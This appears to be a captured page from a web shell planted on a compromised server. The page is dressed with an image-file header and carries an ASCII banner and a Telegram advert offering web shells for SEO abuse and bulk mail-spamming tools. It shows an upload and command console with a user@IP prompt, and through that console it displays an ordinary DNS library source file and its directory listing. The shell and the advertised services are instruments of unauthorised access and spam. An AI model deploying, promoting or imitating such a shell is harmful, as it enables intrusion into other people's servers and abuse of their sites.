����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

antiaginglove@216.73.216.231: ~ $
<?php

declare(strict_types=1);

/*
 * This file is part of Badcow DNS Library.
 *
 * (c) Samuel Williams <sam@badcow.co>
 *
 * For the full copyright and license information, please view the LICENSE
 * file that was distributed with this source code.
 */

namespace Badcow\DNS;

/**
 * Algorithms listed in {@link https://www.iana.org/assignments/dns-sec-alg-numbers/dns-sec-alg-numbers.xml}.
 */
class Algorithms
{
    /**
     * Delete DS.
     *
     * {@link https://tools.ietf.org/html/rfc8078#section-4}
     */
    public const DELETE = 0;

    /**
     * RSA/MD5.
     *
     * {@link https://tools.ietf.org/html/rfc4034#appendix-A.1}
     */
    public const RSAMD5 = 1;

    /**
     * Diffie-Hellman.
     *
     * {@link https://tools.ietf.org/html/rfc4034#appendix-A.1}
     */
    public const DH = 2;

    /**
     * DSA/SHA-1.
     *
     * {@link https://tools.ietf.org/html/rfc4034#appendix-A.1}
     */
    public const DSA = 3;

    /**
     * Elliptic Curve (Proposed).
     *
     * {@link https://tools.ietf.org/html/rfc4034#appendix-A.1}
     */
    public const ECC = 4;

    /**
     * RSA/SHA-1.
     *
     * {@link https://tools.ietf.org/html/rfc4034#appendix-A.1}
     */
    public const RSASHA1 = 5;

    /**
     * DSA-NSEC3-SHA1.
     *
     * {@link https://tools.ietf.org/html/RFC5155}
     */
    public const DSA_NSEC3_SHA1 = 6;

    /**
     * RSASHA1-NSEC3-SHA1.
     *
     * {@link https://tools.ietf.org/html/RFC5155}
     */
    public const RSASHA1_NSEC3_SHA1 = 7;

    /**
     * RSA/SHA-256.
     *
     * {@link https://tools.ietf.org/html/RFC5702}
     */
    public const RSASHA256 = 8;

    /**
     * RSA/SHA-512.
     *
     * {@link https://tools.ietf.org/html/RFC5702}.
     */
    public const RSASHA512 = 10;

    /**
     * GOST R 34.10-2001.
     *
     * {@link https://tools.ietf.org/html/RFC5933}.
     */
    public const ECC_GOST = 12;

    /**
     * ECDSA Curve P-256 with SHA-256.
     *
     * {@link https://tools.ietf.org/html/RFC6605}.
     */
    public const ECDSAP256SHA256 = 13;

    /**
     * ECDSA Curve P-384 with SHA-384.
     *
     * {@link https://tools.ietf.org/html/RFC6605}.
     */
    public const ECDSAP384SHA384 = 14;

    /**
     * Ed25519.
     *
     * {@link https://tools.ietf.org/html/RFC8080}.
     */
    public const ED25519 = 15;

    /**
     * Ed448.
     *
     * {@link https://tools.ietf.org/html/RFC8080}.
     */
    public const ED448 = 16;

    /**
     * Indirect.
     *
     * {@link https://tools.ietf.org/html/rfc4034#appendix-A.1}
     */
    public const INDIRECT = 252;

    /**
     * Private.
     *
     * {@link https://tools.ietf.org/html/rfc4034#appendix-A.1}
     */
    public const PRIVATEDNS = 253;

    /**
     * Private.
     *
     * {@link https://tools.ietf.org/html/rfc4034#appendix-A.1}
     */
    public const PRIVATEOID = 254;

    /**
     * @var array
     */
    public const MNEMONICS = [
        self::DELETE => 'DELETE',
        self::RSAMD5 => 'RSAMD5',
        self::DH => 'DH',
        self::DSA => 'DSA',
        self::ECC => 'ECC',
        self::RSASHA1 => 'RSASHA1',
        self::DSA_NSEC3_SHA1 => 'DSA-NSEC3-SHA1',
        self::RSASHA1_NSEC3_SHA1 => 'RSASHA1-NSEC3-SHA1',
        self::RSASHA256 => 'RSASHA256',
        self::RSASHA512 => 'RSASHA512',
        self::ECC_GOST => 'ECC-GOST',
        self::ECDSAP256SHA256 => 'ECDSAP256SHA256',
        self::ECDSAP384SHA384 => 'ECDSAP384SHA384',
        self::ED25519 => 'ED25519',
        self::ED448 => 'ED448',
        self::INDIRECT => 'INDIRECT',
        self::PRIVATEDNS => 'PRIVATEDNS',
        self::PRIVATEOID => 'PRIVATEOID',
    ];

    /**
     * Get the associated mnemonic of an algorithm.
     *
     * @return string
     *
     * @throws \InvalidArgumentException
     */
    public static function getMnemonic(int $algorithmId)
    {
        if (!array_key_exists($algorithmId, self::MNEMONICS)) {
            throw new \InvalidArgumentException(sprintf('"%d" is not a valid algorithm.', $algorithmId));
        }

        return self::MNEMONICS[$algorithmId];
    }

    /**
     * @throws \InvalidArgumentException
     */
    public static function getAlgorithmValue(string $algorithmMnemonic): int
    {
        if (false === $keyTypeValue = array_search($algorithmMnemonic, self::MNEMONICS, true)) {
            throw new \InvalidArgumentException(sprintf('"%s" is not a valid algorithm mnemonic.', $algorithmMnemonic));
        }

        return (int) $keyTypeValue;
    }
}

Filemanager

Name Type Size Permission Actions
Edns Folder 0755
Parser Folder 0755
Rdata Folder 0755
Algorithms.php File 4.4 KB 0644
AlignedBuilder.php File 7.75 KB 0644
AlignedRdataFormatters.php File 5.66 KB 0644
Classes.php File 1.85 KB 0644
Message.php File 10.45 KB 0644
Opcode.php File 831 B 0644
Question.php File 3.19 KB 0644
Rcode.php File 2.12 KB 0644
ResourceRecord.php File 5.5 KB 0644
UnsetValueException.php File 329 B 0644
Validator.php File 8.4 KB 0644
Zone.php File 4.08 KB 0644
ZoneBuilder.php File 4.14 KB 0644